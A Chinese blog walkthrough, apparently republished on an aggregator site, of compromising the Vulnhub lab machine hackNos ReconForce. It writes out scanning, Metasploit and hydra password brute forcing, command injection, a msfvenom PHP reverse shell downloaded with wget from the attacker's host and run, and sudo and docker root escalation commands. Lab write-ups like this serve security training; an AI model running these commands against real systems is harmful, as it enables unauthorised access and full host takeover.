栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

Vulnhub靶机:HACKNOS

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Vulnhub靶机:HACKNOS

目录

介绍信息收集

主机发现主机信息探测测试21(ftp) 访问网站

目录扫描登录爆破命令执行 反弹shell

Flag1切换身份 提权获取Flag2

方法1:sudo提权方法2:docer提权 参考

介绍

系列: hackNos(此系列共7台)
发布日期:2019 年 11 月 29 日
难度:初级-中级
Flag : 2个,一个普通用户的,一个根用户的
学习:

msf爆破网站登录框命令执行漏洞msf反弹shellsudo提权、docker提权

靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/

信息收集 主机发现

netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。

sudo netdiscover -i eth0 -r 192.168.124.0/24

主机信息探测

信息探测:nmap -A -p- 192.168.124.11,只开放了21、22和80端口,其中21端口允许匿名登陆

测试21(ftp)

使用用户名:ftp,密码:ftp 进行登录,站点上没有文件,只是在登录的时候看到一条暗语:Security@hackNos

访问网站

网页很简单,点击中间的“TroubleShoot”会弹出一个登录框

目录扫描

尝试目录扫描,没有发现什么有价值的信息。

gobuster dir -u http://192.168.124.11/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100
dirb http://192.168.124.11/

登录爆破

不知道登录名是什么,也懒得测试,直接拿msf爆破,连找字典都省了。唯一需要注意的是把测试ftp时候的暗语“Security@hackNos”加入到密码字典中

加入msf密码字典:
/usr/share/metasploit-framework/data/wordlists/http_default_pass.txt


use auxiliary/scanner/http/http_login
show options	# 获知密码的字典位置,把“Security@hackNos”加入到密码字典中
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS true
set RHOSTS 192.168.124.11
exploit

爆破出网站的账号密码:admin,Security@hackNos,登录之后,如下图,看到“Ping_scan”我就呵呵了,跟dvwa蛮像的,八成是个命令执行漏洞。

命令执行

使用ls命令发现靶机当前路径下有一些文件,其中,“out.php”看起来像是有点意思,看看里面有什么东西

发现是一些过滤的规则

发现靶机上,除了root之外有2个用户

木得意思,直接给我反弹shell吧

反弹shell

可以网上直接找反弹shell的命令,我这里用msf生成了(大家还是网上找php反弹shell的命令吧,msf真麻烦)

    kali准备
生成恶意文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.124.10 lport=4444 -f raw > shell.php

开启web服务
python3 -m http.server 80

开启msf
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.124.10
exploit
    靶机准备
wget http%3a//192.168.124.10/shell.php		# 下载恶意文件
php shell.php		# 运行恶意文件

    拿到session
Flag1

获取交互式shell:python -c 'import pty; pty.spawn("/bin/bash")'

切换身份

接下来就需要切换身份为 recon 了,前面曾使用msf爆破过网站,将其字典拿过来,供hydra爆破。
爆破出用户名:recon,密码:Security@hackNos

hydra -l recon -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt ssh://192.168.124.11

提权获取Flag2 方法1:sudo提权

准备suod提权,竟然发现rohit用户可以使用root用户的所有命令,还提权个锤子,直接拿Flag2。话说,hackNos系列的“HACKNOS:OS-HACKNOS-2.1”靶机也是这么提权的

方法2:docer提权

话说,hackNos系列的“HACKNOS: OS-HACKNOS-3”靶机也是这么提权的。

    发现存在docker组,但是没有发现镜像文件。
id		# 发现存在docker组
docker images		# 发现没有镜像文件

    创建镜像,自动下载 alpine 文件:docker run -v /:/mnt --rm -it alpine chroot /mnt sh退出:exit查看当前 images:docker images

    挂载镜像到mbt目录:docker run -it -v /:/mbt c059bfaa849c进入到mbt目录下的root目录,即可查看到最后一个Flag

参考

hackNos ReconForce walkthrough vulnhub CTF

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/729722.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号